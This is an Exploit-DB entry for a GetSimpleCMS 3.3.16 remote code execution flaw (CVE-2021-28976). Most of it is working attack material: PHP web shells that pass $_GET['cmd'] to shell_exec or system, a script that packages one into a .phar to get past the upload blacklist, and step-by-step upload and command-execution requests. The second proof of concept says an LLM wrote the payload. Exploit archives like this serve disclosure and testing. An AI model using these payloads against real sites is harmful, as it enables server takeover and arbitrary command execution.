GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)

EDB-ID:

52168

CVE:

2021-28976

EDB Verified:

Author:

CodeSecLab

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2025-04-11

Vulnerable App: 
# Exploit Title: GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/GetSimpleCMS/GetSimpleCMS
# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS
# Version: 3.3.16
# Tested on: Ubuntu Windows
# CVE : CVE-2021-28976

PoC-1:
1)Create a .phar file.
1. Create the PHP script: Save your code (the one you provided) in a file, say index.php: <?php echo shell_exec($_GET['cmd']); ?>
2. Write a PHP script to create the .phar file: Use the Phar class in PHP to package the index.php file into a .phar archive. Create a script named create_phar.php as follows:
<?php
try {
    // Initialize a new Phar object, name it "archive.phar"
    $phar = new Phar('archive.phar');

    // Set the stub (entry point) for the Phar file, pointing to index.php
    $phar->startBuffering();
    $phar->addFromString('index.php', file_get_contents('index.php'));
    $phar->setStub($phar->createDefaultStub('index.php'));
    $phar->stopBuffering();

    echo "Phar archive created successfully!";
} catch (Exception $e) {
    echo "Error: " . $e->getMessage();
}
3. Run the script to generate the .phar file: On your terminal (assuming you're using a system that has PHP installed), run the following command to execute the script: php create_phar.php. 
After running the script, you should find a file named archive.phar in your working directory.

2)Upload file:
1. Upload the 'archive.phar' file using the vulnerable upload functionality at http://getsimplecms/admin/upload.php. 
2. You can find the file at http://getsimplecms/data/uploads/.

3)Details:
 "Validation Mechanisms Before Patch": "File extension blacklist and MIME type blacklist were used but lacked specific filtering for 'phar' file types.",
    "Bypass Technique": "Upload a 'phar' file, as it was not included in the original blacklist, which can be treated as a PHP archive by the server for remote code execution.",
    "Request URL": "http://getsimplecms/admin/upload.php",
    "Request Method": "POST",
    "Request Parameters": {
        "file": "<Malicious File>"
    },


PoC-2:
1) LLM creates the file exploit.phar with the following contents:
malicious.php                                                                                       0000644 0000000 0000000 00000000036 00000000000 010442  0                                                                                                    ustar 00                                                                                                                                                                                                                                                       <?php system($_GET['cmd']); ?>                  

2)
1. Prepare a PHP file named 'exploit.phar' .\n
2. Send a POST request to http://getsimplecms/admin/upload.php with the 'exploit.phar' file as the 'file' parameter.\n
3. Access the uploaded file at http://getsimplecms/data/uploads/exploit.phar and execute commands by passing the 'cmd' parameter (e.g., http://getsimplecms/data/uploads/exploit.phar?cmd=id).

[Replace Your Domain Name]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services